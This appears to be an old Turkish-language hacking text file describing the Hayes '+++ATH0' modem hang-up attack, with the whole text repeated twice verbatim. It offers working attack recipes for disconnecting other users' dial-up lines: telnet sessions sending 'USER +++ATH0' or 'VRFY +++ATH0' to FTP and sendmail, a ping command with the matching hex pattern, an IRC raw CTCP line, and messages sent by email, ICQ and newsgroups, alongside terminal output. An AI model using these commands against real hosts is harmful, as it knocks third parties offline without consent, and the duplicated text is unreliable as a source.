Piyasadaki bir cok modem Hayes Komut Seti (ATZ, ATDT, ATH0..) kullanirlar.
Maalesef ki(?) bu tip modemler bazi ozel stringlerin i$lenmesine de izin verirler.
Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. iste hikayenin ozu bu.
Bu attacktan tum modemler etkilenmez.
Ornegin U.S. Robotics, 33.6
(+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez)
Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir .
PPP, IP datagramI default olarak sIkIstIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen
okuyacagindan hat kesilme durumu gerceklesir
Tipik attack ornekleri:
1) 21 portuna telnet ile:
elusive# telnet 199.99.99.99 21
Trying 199.99.99.99...
Connected to 192.168.1.1.
Escape character is '^]'.
220 abc FTP server (Version .............](1) Fri Apr 9
23:41:
USER +++ATH0
^]
telnet> close
Connection closed.
elusive# telnet 192.168.1.1 21
Trying 199.99.99.99...
telnet: Unable to connect to remote host: Network is unreachable
elusive#
2) sendmaile telnet ile baglanın (qmail olunca olmuyor) ve "HELO orasi.com" yazın orasi neresiyse baglaninca welcome vs diycektir..
sonra: VRFY +++ATH0
sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu:
550 +++ATH0
3) ftp'ye baglanın. USER +++ATH0 kullanın.Diycektir ki:
331 Password required for +++ATH0
dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi).
4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli,
ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0
yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p
5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz)
(Ping modem killer ilk defa MrPhoenix ([email protected]) tarafindan bahsedilmistir.)
+++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter)
#ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss
5 paket gitti..1-2 paket bazan yetmiyor(nedense??).
cali$madIgI durum:
# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 ms
peki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan
cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar.
degilse..maili alan kisi alirken problem yasar.
ICQ Mesajın içine aynı komutu yazın. Karşı makine büyük olasılıkla hattan düşecektir.
Bu komutun yazı ile de olsa yazılı olduğu bir htm dosyasını upload etmeye çalışın %90 bağlantınız kopacak.
News serverda deneyin (Bunu denemedim) News servera bu komut içeren bir mesaj atın. Mesajı okumak isteyenler düşecektir.
IRC icin bir rivayete gore karsI tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar..
Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde:
//raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
yukarida satirda hic bir imla ya da yazim hatasI yoktur!.
(bas taraftaki iki tane slash da dahiL!)
ALINTI!.
%80 ihtimalle işe yarar okuduklarım kadarıyla.
Maalesef ki(?) bu tip modemler bazi ozel stringlerin i$lenmesine de izin verirler.
Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. iste hikayenin ozu bu.
Bu attacktan tum modemler etkilenmez.
Ornegin U.S. Robotics, 33.6
(+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez)
Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir .
PPP, IP datagramI default olarak sIkIstIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen
okuyacagindan hat kesilme durumu gerceklesir
Tipik attack ornekleri:
1) 21 portuna telnet ile:
elusive# telnet 199.99.99.99 21
Trying 199.99.99.99...
Connected to 192.168.1.1.
Escape character is '^]'.
220 abc FTP server (Version .............](1) Fri Apr 9
23:41:
USER +++ATH0
^]
telnet> close
Connection closed.
elusive# telnet 192.168.1.1 21
Trying 199.99.99.99...
telnet: Unable to connect to remote host: Network is unreachable
elusive#
2) sendmaile telnet ile baglanın (qmail olunca olmuyor) ve "HELO orasi.com" yazın orasi neresiyse baglaninca welcome vs diycektir..
sonra: VRFY +++ATH0
sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu:
550 +++ATH0
3) ftp'ye baglanın. USER +++ATH0 kullanın.Diycektir ki:
331 Password required for +++ATH0
dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi).
4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli,
ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0
yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p
5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz)
(Ping modem killer ilk defa MrPhoenix ([email protected]) tarafindan bahsedilmistir.)
+++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter)
#ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss
5 paket gitti..1-2 paket bazan yetmiyor(nedense??).
cali$madIgI durum:
# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 ms
peki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan
cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar.
degilse..maili alan kisi alirken problem yasar.
ICQ Mesajın içine aynı komutu yazın. Karşı makine büyük olasılıkla hattan düşecektir.
Bu komutun yazı ile de olsa yazılı olduğu bir htm dosyasını upload etmeye çalışın %90 bağlantınız kopacak.
News serverda deneyin (Bunu denemedim) News servera bu komut içeren bir mesaj atın. Mesajı okumak isteyenler düşecektir.
IRC icin bir rivayete gore karsI tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar..
Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde:
//raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
yukarida satirda hic bir imla ya da yazim hatasI yoktur!.
(bas taraftaki iki tane slash da dahiL!)
ALINTI!.
%80 ihtimalle işe yarar okuduklarım kadarıyla.
